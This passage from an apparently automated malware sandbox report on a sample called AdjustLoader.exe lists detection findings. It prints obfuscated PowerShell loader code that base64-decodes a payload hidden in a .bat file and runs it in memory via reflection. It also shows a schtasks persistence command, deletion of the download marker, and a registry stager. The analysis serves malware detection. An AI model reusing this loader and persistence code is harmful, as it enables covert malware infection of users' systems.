'$wgnFA=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$jLLdq);'.Replace('*', ''); IEX '$rUGem=$wgnFA.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$rUGem.*I*n*v*o*k*e*($null, $mXFYk);'.Replace('*', '');}$XpYqP = 'C:\Windows\$nya-onimai3\$nya-Loli.bat';$host.UI.RawUI.WindowTitle = $XpYqP;$wCepT=[System.IO.File]::ReadAllText($XpYqP).Split([Environment]::NewLine);foreach ($CrLwk in $wCepT) { if ($CrLwk.StartsWith(':: ')) { $BaEdL=$CrLwk.Substring(3); break; }}$USpSf=[string[]]$BaEdL.Split('\');IEX '$qjsDB=pEnJN (OEJrN ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($USpSf[0])));'.Replace('*', '');IEX '$KucUO=pEnJN (OEJrN ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($USpSf[1])));'.Replace('*', '');GDwhu $qjsDB $null;GDwhu $KucUO (,[string[]] ('')); "
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:TnoNKHHDUXvA{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wrAnTRmMMLZATy,[Parameter(Position=1)][Type]$iejhPFpNZp)$FisCHMOcbia=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+'e'+[Char](99)+'t'+'e'+''+'d'+''+'D'+''+[Char](101)+''+'l'+''+[Char](101)+'g'+'a'+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+'e'+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+''+'T'+''+'y'+''+'p'+'e',''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+','+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+'l'+[Char](101)+'d,'+'A'+''+'n'+'s'+[Char](105)+'C'+'l'+''+[Char](97)+''+'s'+'s,'+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+'C'+'l'+''+[Char](97)+''+'s'+''+'s'+'',[MulticastDelegate]);$FisCHMOcbia.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+[Char](101)+'c'+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+''+'i'+''+'d'+'e'+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$wrAnTRmMMLZATy).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$FisCHMOcbia.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+',H'+[Char](105)+'d'+'e'+''+[Char](66)+'y'+'S'+''+'i'+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+[Char](119)+''+'S'+'l'+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+'a'+''+[Char](108)+'',$iejhPFpNZp,$wrAnTRmMMLZATy).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+'e'+''+','+''+'M'+'a'+[Char](110)+'a'+'g'+''+'e'+''+[Char](100)+'');Write-Output $FisCHMOcbia.CreateType();}$beUOypwDoUbYD=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+[Char](115)+''+'t'+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')}).GetType('M'+[Char](105)+'cro'+[Char](115)+''+'o'+'f'+'t'+'.'+'W'+''+[Char](105)+'n32'+[Char](46)+'U'+'n'+'s'+'a'+''+[Char](102)+''+'e'+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+'e'+'t'+''+'h'+'o'+[Char](100)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Binary contains a suspicious time stamp
Source: AdjustLoader.exe Static PE information: 0xB2DAB3E1 [Sun Feb 1 01:29:05 2065 UTC]
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\AdjustLoader.exe Code function: 0_2_00007FFD9B7E00AD pushad ; iretd 0_2_00007FFD9B7E00C1
Source: C:\Windows\System32\cmd.exe Code function: 1_3_00000208442EA5DD push rcx; retf 003Fh 1_3_00000208442EA5DE
Source: C:\Windows\System32\conhost.exe Code function: 2_3_0000020E8B1DA5DD push rcx; retf 003Fh 2_3_0000020E8B1DA5DE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 18_2_00007FFD9B6BD2A5 pushad ; iretd 18_2_00007FFD9B6BD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 18_2_00007FFD9B7D00AD pushad ; iretd 18_2_00007FFD9B7D00C1
Source: C:\Windows\System32\cmd.exe Code function: 21_3_000001CC9146A5DD push rcx; retf 003Fh 21_3_000001CC9146A5DE
Source: C:\Windows\System32\conhost.exe Code function: 22_3_00000261C3DDA5DD push rcx; retf 003Fh 22_3_00000261C3DDA5DE
Source: C:\Windows\System32\conhost.exe Code function: 27_3_000002220AB7A5DD push rcx; retf 003Fh 27_3_000002220AB7A5DE
Source: C:\Windows\System32\conhost.exe Code function: 47_3_0000024D9FF5A5DD push rcx; retf 003Fh 47_3_0000024D9FF5A5DE
Source: C:\Windows\System32\conhost.exe Code function: 54_3_00000123B853A5DD push rcx; retf 003Fh 54_3_00000123B853A5DE
Source: C:\Windows\System32\dllhost.exe Code function: 55_3_0000021A201AA5DD push rcx; retf 003Fh 55_3_0000021A201AA5DE
Source: C:\Windows\System32\winlogon.exe Code function: 56_3_00000225DC65A5DD push rcx; retf 003Fh 56_3_00000225DC65A5DE
Source: C:\Windows\System32\winlogon.exe Code function: 56_3_00000225DC62A5DD push rcx; retf 003Fh 56_3_00000225DC62A5DE
Source: C:\Windows\System32\lsass.exe Code function: 57_3_00000202C0AFA5DD push rcx; retf 003Fh 57_3_00000202C0AFA5DE
Source: C:\Windows\System32\svchost.exe Code function: 58_3_000002A66131A5DD push rcx; retf 003Fh 58_3_000002A66131A5DE
Source: C:\Windows\System32\dwm.exe Code function: 59_3_000002BAAF24A5DD push rcx; retf 003Fh 59_3_000002BAAF24A5DE
Source: C:\Windows\System32\dwm.exe Code function: 59_3_000002BAAF1BA5DD push rcx; retf 003Fh 59_3_000002BAAF1BA5DE
Source: C:\Windows\System32\svchost.exe Code function: 60_3_0000026A879AA5DD push rcx; retf 003Fh 60_3_0000026A879AA5DE
Source: C:\Windows\System32\svchost.exe Code function: 61_3_000001795378A5DD push rcx; retf 003Fh 61_3_000001795378A5DE
Source: C:\Windows\System32\svchost.exe Code function: 62_3_000002295D54A5DD push rcx; retf 003Fh 62_3_000002295D54A5DE

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "schtasks" /create /sc MONTHLY /tn $nya-Loli_1 /F /RL HIGHEST /tr "wscript.exe 'C:\Windows\$nya-onimai3\$nya-Loli.vbs' 'C:\Windows\$nya-onimai3\$nya-Loli.bat'"

Hooking and other Techniques for Hiding and Protection
barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | delete
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Stores large binary data to the registry
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $nya-stager
Source: C:\Users\user\Desktop\AdjustLoader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\AdjustLoader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
